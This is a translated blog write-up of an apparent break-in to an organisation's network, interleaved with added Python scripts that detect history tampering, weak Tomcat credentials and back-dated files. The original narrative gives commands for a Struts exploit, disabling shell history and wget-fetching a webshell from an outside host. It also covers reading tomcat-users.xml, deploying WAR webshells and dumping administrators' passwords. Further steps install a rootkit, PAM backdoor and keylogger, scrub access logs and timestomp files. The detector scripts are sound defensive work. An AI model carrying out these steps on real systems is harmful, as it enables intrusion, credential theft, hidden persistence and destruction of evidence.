Access to the intranet was lost recently, so a new entry point had to be found from the Internet to get back into the intranet.
I scanned for weak passwords with a dictionary generated by the Phoenix scanner, checked some web pages in the C segment, port-scanned them, and found that a Wingsoft product was running on host 13. A vulnerability for it had been published on WooYun, and an external shell was obtained using the st2-005 vulnerability.
0x02 Access the boundary Server
Run
    unset HISTORY HISTFILE HISTSAVE HISTZONE HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
so that the system does not record our command history.
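From the defender's side, the trick above leaves a recognisable trace in shell start-up files and in the history file itself. The following script is an added example, not code from the original post: it flags the HISTFILE=/dev/null, HISTSIZE=0 and unset HIST* patterns in rc files and reports a .bash_history that has been replaced by a symlink to /dev/null. The sample .bashrc and the demo home directory are constructed here; the file names scanned are assumptions about a typical Linux account.

```python
import os
import re
import stat
import tempfile

# Tampering patterns in shell start-up files: history file redirected to
# /dev/null, history sizes forced to zero, or the HIST* variables unset.
# Each line is checked on its own, with trailing comments stripped.
HIST_TAMPER_RE = re.compile(
    r"^\s*(?:export\s+)?(?:"
    r"HISTFILE\s*=\s*/dev/null"
    r"|HIST(?:FILE)?SIZE\s*=\s*0\b"
    r"|unset\s+(?:\w+\s+)*HIST(?:FILE|SIZE|FILESIZE)\b"
    r")",
    re.IGNORECASE,
)

# Constructed sample .bashrc (not from the page): two harmless lines and
# three that disable history recording.
SAMPLE_BASHRC = """# constructed .bashrc sample
alias ll='ls -l'
export HISTFILE=/dev/null
export HISTSIZE=0
unset HISTFILE
HISTCONTROL=ignoreboth
"""


def scan_rc_text(text):
    """Return (line_number, line) for every line that disables history."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        code = line.split("#", 1)[0]  # ignore comments
        if HIST_TAMPER_RE.search(code):
            hits.append((n, line.strip()))
    return hits


def history_file_findings(path):
    """Inspect a history file without following symlinks.

    A history file that is a symlink to /dev/null is the persistent form of
    the same trick; an empty file on an account that is in use is a weaker hint.
    """
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return ["missing"]
    findings = []
    if stat.S_ISLNK(st.st_mode):
        target = os.readlink(path)
        findings.append("symlink-to-devnull" if target == "/dev/null" else "symlink:" + target)
    elif st.st_size == 0:
        findings.append("empty")
    return findings


def scan_home(home):
    """Scan the usual start-up files and the history file of one home directory."""
    report = {}
    for name in (".bashrc", ".bash_profile", ".profile", ".zshrc"):  # assumed rc file set
        p = os.path.join(home, name)
        if os.path.isfile(p):
            with open(p, encoding="utf-8", errors="replace") as fh:
                hits = scan_rc_text(fh.read())
            if hits:
                report[name] = hits
    hist = history_file_findings(os.path.join(home, ".bash_history"))
    if hist:
        report[".bash_history"] = hist
    return report


def build_demo_home():
    """Constructed home directory: tampered .bashrc plus a /dev/null history symlink."""
    home = tempfile.mkdtemp(prefix="home-")
    with open(os.path.join(home, ".bashrc"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_BASHRC)
    os.symlink("/dev/null", os.path.join(home, ".bash_history"))
    return home


if __name__ == "__main__":
    print(scan_home(build_demo_home()))
```

Run it against /root and every directory under /home as part of a host review; a hit in an rc file is worth correlating with the account's last login and with any auditd or process-accounting records covering the same window.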
The tool's default method could not write a webshell. After finding the web directory, chmod 777 -R /js/ was used to make it writable, but a webshell still could not be written; wget -O /web/js/help.jsp www.xxx.com/shell.txt could not write the file either.
Run
    locate tomcat-users.xml
    cat /mulu/tomcat-users.xml
After finding the password, log in to the Tomcat manager, deploy a WAR package to get a webshell, deploy several one-liner webshells, change the files' timestamps, and start gathering information from the webshell in preparation for intranet penetration.
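The step above works because the manager credentials sit in cleartext in a readable tomcat-users.xml. The script below is an added example, not code from the original post: it audits a tomcat-users.xml for accounts holding a manager role and reports cleartext or weak passwords, accounts that combine manager-gui with manager-script, and a file that is world-readable. The sample file is constructed; the common-password list and the 24-hour-style thresholds are assumptions an auditor would tune.

```python
import os
import re
import stat
import tempfile
import xml.etree.ElementTree as ET

NS = {"t": "http://tomcat.apache.org/xml"}
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status"}
COMMON_PASSWORDS = {"tomcat", "admin", "manager", "password", "123456", "s3cret"}  # assumed list
# Tomcat's digested credential formats: a bare hex digest, or salt$iterations$digest.
DIGEST_RE = re.compile(r"^(?:[0-9a-f]{32,}|[0-9a-f]+\$\d+\$[0-9a-f]+)$", re.I)

# Constructed sample tomcat-users.xml (not from the page). 'ops' is the only
# account whose password is stored digested.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="tomcat"/>
  <user username="tomcat" password="tomcat" roles="tomcat,manager-gui"/>
  <user username="deploy" password="Deploy-2015!" roles="manager-script"/>
  <user username="ops" password="e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" roles="manager-gui"/>
  <user username="reader" password="reader" roles="tomcat"/>
</tomcat-users>
"""


def audit_tomcat_users(xml_text):
    """Return one finding per account that can reach the manager webapp."""
    root = ET.fromstring(xml_text)
    # Tomcat 7 files carry no namespace; accept both forms.
    users = root.findall("t:user", NS) or root.findall("user")
    findings = []
    for u in users:
        name = u.get("username") or u.get("name") or ""
        pw = u.get("password", "")
        roles = {r.strip() for r in u.get("roles", "").split(",") if r.strip()}
        mgr = roles & MANAGER_ROLES
        if not mgr:
            continue  # cannot deploy applications, out of scope here
        issues = []
        if not DIGEST_RE.match(pw):
            issues.append("cleartext-password")
        if pw.lower() in COMMON_PASSWORDS or pw.lower() == name.lower():
            issues.append("weak-password")
        if {"manager-gui", "manager-script"} <= mgr:
            issues.append("gui-and-script")
        findings.append({"user": name, "roles": sorted(mgr), "issues": issues})
    return findings


def world_readable(path):
    """True when the 'other' read bit is set, i.e. any local account can read it."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def audit_file(path):
    with open(path, encoding="utf-8") as fh:
        accounts = audit_tomcat_users(fh.read())
    return {"path": path, "world_readable": world_readable(path), "accounts": accounts}


def build_demo_file():
    """Write the constructed sample to a temp dir with the weak 0644 mode."""
    d = tempfile.mkdtemp(prefix="tomcat-conf-")
    p = os.path.join(d, "tomcat-users.xml")
    with open(p, "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_TOMCAT_USERS)
    os.chmod(p, 0o644)
    return p


if __name__ == "__main__":
    report = audit_file(build_demo_file())
    print("world readable:", report["world_readable"])
    for acct in report["accounts"]:
        print(acct)
```

On a real host, point audit_file at $CATALINA_BASE/conf/tomcat-users.xml; the fixes the findings map to are storing digested credentials via a CredentialHandler, splitting GUI and script roles across separate accounts, and setting the file to 0640 owned by the Tomcat user.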
    netstat -tlnp    # view the ports connected to the intranet
10.19.1.56
10.19.1.66
192.168.1.184
10.19.1.150
10.22.1.222
10.22.1.249
Going through the configuration files, connect to the database in the 10.48.14.52 segment and dump it. Look up the administrator passwords and record the passwords of the three administrators (Chen *, Liu *, Peng *).
    python -h
    nmap -h
A Python environment was found on the machine.
Scanning with insightscan.py reported an error (). Upload the Phoenix scanner (adjusting permissions as needed); if the upload fails, download the file onto the host to install it:
    wget -O /tmp/xx.zip http://www.baidu.com/xx.zip
    unzip /tmp/xx.zip
    chmod 777 FF
    ./FF
An error about a missing dynamic link library appeared (tmux: Error while loading shared libraries: libevent-1.4.so.2: cannot open shared object file: no such file or directory). Searching Baidu:
There are two common causes. One is that the operating system does not contain the shared library (a lib*.so.* file) or has the wrong version of it; in that case download and install it. The other is that the shared library is installed, but when the program that needs it runs, it cannot find the library file under the default shared-library search path. Reference: http://www.jb51.net/article/35383.htm

0x03 Maintaining access

(1) Install a rootkit. An application-level rootkit was installed; it is basically an encrypted nc, and only the port, root, and password need to be configured.

(2) Install a PAM backdoor to record the root password. The local root password is needed: if /etc/shadow cannot be cracked, a PAM backdoor or SSH backdoor can be installed to record the root password.
Obtain the PAM version:
    rpm -qa | grep pam
Reference: http://www.freebuf.com/articles/system/24104.html
http://www.nxadmin.com/system/1199.html
(3) Install a keylogger: https://github.com/dorneanu/ixkeylog/

0x04 Clearing logs

(1) Web log cleanup
    awk '!/123.123.123.123|111.111.111.111|phpspy.php/' /var/log/httpd/access_log > temp && mv temp /var/log/httpd/access_log
    touch -amt 200901231532 filename    # sets the file time back
There is also a trick for batch modification:
    ls | xargs touch -amt 200901231532    # changes the times directly
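The timestamp trick above has a hard limit that investigators rely on: touch -amt (or the utime call underneath it) rewrites atime and mtime, but the kernel sets ctime to the moment of that call and nothing short of raw disk access can choose it, so a file whose mtime is years older than its ctime stands out, and a modification time falling exactly on :00 seconds is a weaker second hint since touch -t without seconds always yields it. The script below is an added example, not code from the original post; it walks a webroot and reports such files. The demo webroot is constructed, and the extension list and the one-day gap threshold are assumptions to tune per site (package-installed binaries legitimately have an mtime older than their ctime, which is why the walk is restricted to web content).

```python
import os
import tempfile
import time

CTIME_GAP = "ctime-newer-than-mtime"
ROUND_MINUTE = "round-minute"


def inspect_file(path, min_gap_seconds=24 * 3600):
    """Return the timestomping indicators for one file (empty list = none)."""
    st = os.stat(path)
    indicators = []
    # ctime cannot be set by touch; a large gap means mtime was rewritten later.
    if st.st_ctime - st.st_mtime >= min_gap_seconds:
        indicators.append(CTIME_GAP)
    # touch -t YYYYMMDDhhmm leaves seconds at :00.
    if int(st.st_mtime) % 60 == 0:
        indicators.append(ROUND_MINUTE)
    return indicators


def timestomp_candidates(root, exts=(".jsp", ".php", ".jar", ".war", ".class"),
                         min_gap_seconds=24 * 3600):
    """Walk a webroot and report files showing the ctime gap.

    Only files with the gap are returned; the round-minute flag is attached
    as extra context. Restricting the walk to web content types (assumed
    list) keeps package-installed files out of the result.
    """
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if exts and not name.lower().endswith(tuple(exts)):
                continue
            path = os.path.join(dirpath, name)
            try:
                ind = inspect_file(path, min_gap_seconds)
            except OSError:
                continue
            if CTIME_GAP in ind:
                st = os.stat(path)
                hits.append({"path": path, "indicators": ind,
                             "mtime": time.ctime(st.st_mtime),
                             "ctime": time.ctime(st.st_ctime)})
    return sorted(hits, key=lambda h: h["path"])


def build_demo_webroot():
    """Constructed sample: one back-dated file and one untouched file."""
    root = tempfile.mkdtemp(prefix="webroot-")
    stomped = os.path.join(root, "help.jsp")
    normal = os.path.join(root, "index.jsp")
    for p in (stomped, normal):
        with open(p, "w") as fh:
            fh.write("<%-- constructed sample --%>\n")
    # Same effect as `touch -amt 200901231532 help.jsp`: atime/mtime go back
    # to 2009, ctime becomes now.
    old = time.mktime((2009, 1, 23, 15, 32, 0, 0, 0, -1))
    os.utime(stomped, (old, old))
    return root, stomped, normal


if __name__ == "__main__":
    demo_root, _, _ = build_demo_webroot()
    for hit in timestomp_candidates(demo_root):
        print(hit["path"], hit["indicators"], "mtime:", hit["mtime"], "ctime:", hit["ctime"])
```

For the access_log rewrite shown just above, the analogous check is on the log file itself: writing to temp and mv-ing it over the original gives the log a new inode, a fresh ctime, and the ownership of whoever ran the command rather than the web server's account, so comparing the log's inode and owner against a baseline catches it.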
(2) Clearing system logs
[Original] One penetration test process-from Internet to Intranet